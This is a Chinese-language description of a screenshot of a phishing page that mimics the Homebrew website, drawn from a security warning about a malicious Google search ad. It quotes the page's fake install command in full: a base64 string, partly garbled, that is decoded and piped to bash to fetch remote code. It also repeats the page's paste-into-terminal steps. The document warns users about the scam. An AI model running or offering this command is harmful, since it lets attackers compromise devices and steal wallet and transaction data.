仿冒Homebrew官网的钓鱼页面截图
文本内容
页面顶部为啤酒杯叠加苹果的仿冒Homebrew Logo,下方标注标题“Brew”,副标题为“The Missing Package Manager for macOS (or Linux)”;安装区域给出恶意安装命令:$ echo 'L2Jpi9iYXNoIC1jICIkKGN1cmwLWZzU0wgaHR0cDovLzJuMjYuYzUuMTEyL0Z1dUMTEyL0Z1d29yay' | base64 -d | bash,提示用户将该命令粘贴到macOS终端或Linux shell中执行;下方“How to Install”模块列出4步安装指引:1. 打开终端app;2. 复制命令;3. 粘贴到终端运行;4. 跟随提示操作。
整体描述
这张图片是仿冒Mac/Linux常用包管理工具Homebrew官网的钓鱼页面实拍截图,页面高度模仿了真实Homebrew官网的设计风格,顶部设置了啤酒杯叠加苹果造型的仿冒官方Logo,标注“Brew”及“适用于macOS(或Linux)的缺失包管理器”的描述,与官方宣传语一致以降低用户警惕性;页面中部提供了包含恶意代码的安装命令,引导用户复制粘贴到终端执行,还列出了详细的分步安装指引,诱导用户完成恶意命令的运行,若用户执行该命令,可能会导致设备被入侵,钱包、交易相关等敏感信息被盗取。
来源说明
该截图来自X平台(原Twitter)用户雲鳩转发的用户MilkSU发布的安全预警,预警提示用户在谷歌搜索Homebrew时,若首个搜索结果是谷歌投放的business.google.com广告,即为该钓鱼页面,使用Mac设备且有钱包、交易类相关操作的用户需要提高警惕,避免执行该页面提供的虚假安装命令导致设备信息泄露、资产受损。